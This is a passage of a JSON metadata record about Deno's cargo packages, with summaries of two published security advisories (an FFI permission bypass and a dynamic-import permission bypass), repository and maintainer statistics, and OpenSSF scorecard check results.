Deno runtime could bypass permission checks and execute arbitrary shell code.\n\nThere is **no** evidence that this vulnerability has been exploited in the wild.\n\nThis vulnerability does **not** affect users of Deno Deploy.\n\n### Patches\n\nThe vulnerability has been patched in Deno 1.20.3.\n\n### Workarounds\n\nThere is no workaround. All users are recommended to upgrade to 1.20.3 immediately\n\n---\n\nThe cause of this error was that certain FFI operations did not correctly check for permissions. The issue was fixed in [this](https://github.com/denoland/deno/pull/14115) pull request.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2022-03-29T22:10:10.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":10.0,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-838h-jqp6-cf2f","https://nvd.nist.gov/vuln/detail/CVE-2022-24783","https://github.com/denoland/deno/releases/tag/v1.20.3","https://github.com/denoland/deno/pull/14115","https://github.com/denoland/deno/commit/fcfce1bb869fddc629e6d889d6ba1328b80b0dcf","https://github.com/denoland/deno/compare/v1.20.2...v1.20.3","https://github.com/advisories/GHSA-838h-jqp6-cf2f"],"source_kind":"github","identifiers":["GHSA-838h-jqp6-cf2f","CVE-2022-24783"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2022-12-21T16:12:31.502Z","updated_at":"2026-09-01T18:14:19.713Z","epss_percentage":0.01147,"epss_percentile":0.64535,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04MzhoLWpxcDYtY2YyZs02gA","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04MzhoLWpxcDYtY2YyZs02gA","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.20.3","vulnerable_version_range":"\u003e= 1.18.0, \u003c 1.20.3"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04MzhoLWpxcDYtY2YyZs02gA/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14cHdqLTd2OHEtbWNnas0V-g","url":"https://github.com/advisories/GHSA-xpwj-7v8q-mcgj","title":"Deno's static imports inside dynamically imported modules do not adhere to permission checks","description":"### Impact\n\nModules that are dynamically imported through `import()` or `new Worker` might have been able to bypass network and file system permission checks when statically importing other modules. In Deno 1.5.x and 1.6.x only programs dynamically importing (especially transitively) untrusted code are affected. In Deno 1.7.x all programs importing (especially transitively) untrusted code are affected.\n\nIn effect an attacker in control of a (possibly remote) module in a programs module graph has been able to, **irrespective of permissions**:\n1. initiate GET requests to arbitrary URLs on the internet (including LAN) and possibly read (parts of) the contents of these resources.\n2. check for existence of arbitrary paths on the file system, and possibly read (parts of) the contents of these files.\n\nIn Deno 1.5.x (October 27th, 2020) and Deno 1.6.x (December 8th, 2020) the attacker module had to have been granted permissions to load dynamically through the network / fs read permission. Since Deno 1.7.x (January 19th, 2021) this vulnerability was able to be exploited in a fully sandboxed isolate (without any permissions). This vulnerability was not present in releases prior to 1.5.0.\n\nArbitrary non-GET requests, control over request headers, or file system writes are not possible through this vulnerability. Users of the `deno_core`, `deno_runtime`, or other `deno_*` crates are not affected. This is a Deno CLI only vulnerability.\n\nWe are relatively confident this was not abused in the wild, as by default Deno prints out a green \"Download\" message when remote imports are downloaded, and this would have caused suspicion if it occurred in the middle of a programs execution. This message can be silenced with the `--quiet` flag.  \n\n### Patches\n\nThe vulnerability has been patched in Deno release 1.10.2. You can upgrade to the latest Deno version by running the `deno upgrade` command. The release is available through all official download channels. \n\n### Workarounds\n\nThere is no workaround for this issue.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue on [the issue tracker](https://github.com/denoland/deno)\n* Discuss on [Discord](https://discord.gg/deno)\n","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2021-09-23T23:18:03.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-xpwj-7v8q-mcgj","https://nvd.nist.gov/vuln/detail/CVE-2021-32619","https://github.com/advisories/GHSA-xpwj-7v8q-mcgj"],"source_kind":"github","identifiers":["GHSA-xpwj-7v8q-mcgj","CVE-2021-32619"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2022-12-21T16:12:46.343Z","updated_at":"2026-09-01T18:14:50.046Z","epss_percentage":0.01113,"epss_percentile":0.63673,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cHdqLTd2OHEtbWNnas0V-g","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14cHdqLTd2OHEtbWNnas0V-g","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.10.2","vulnerable_version_range":"\u003e= 1.5.0, \u003c= 1.10.1"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cHdqLTd2OHEtbWNnas0V-g/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno","docker_dependents_count":6,"docker_downloads_count":451,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-29T03:03:41.777Z","issues_count":6626,"pull_requests_count":9646,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1532231.9017556966,"issues_closed_count":3798,"pull_requests_closed_count":8030,"pull_request_authors_count":580,"issue_authors_count":2473,"avg_comments_per_issue":2.50814971325083,"avg_comments_per_pull_request":0.7193655401202571,"merged_pull_requests_count":7012,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":666,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1323857.4606060607,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":660,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.2477477477477477,"past_year_avg_comments_per_pull_request":1.1131447587354408,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T16:24:05.424Z","updated_at":"2022-11-07T16:24:05.424Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:23.886Z","updated_at":"2023-07-18T22:41:23.886Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4046935,"name":"deno_3p_lib","ecosystem":"cargo","description":"Provides the deno executable","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2021-03-29T20:04:59.714Z","latest_release_published_at":"2022-09-12T21:30:38.031Z","latest_release_number":"1.25.2","last_synced_at":"2026-08-29T21:56:57.661Z","created_at":"2022-04-12T09:57:31.533Z","updated_at":"2026-08-29T21:56:57.661Z","registry_url":"https://crates.io/crates/deno_3p_lib/","install_command":"cargo install deno_3p_lib","documentation_url":"https://docs.rs/deno_3p_lib/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not 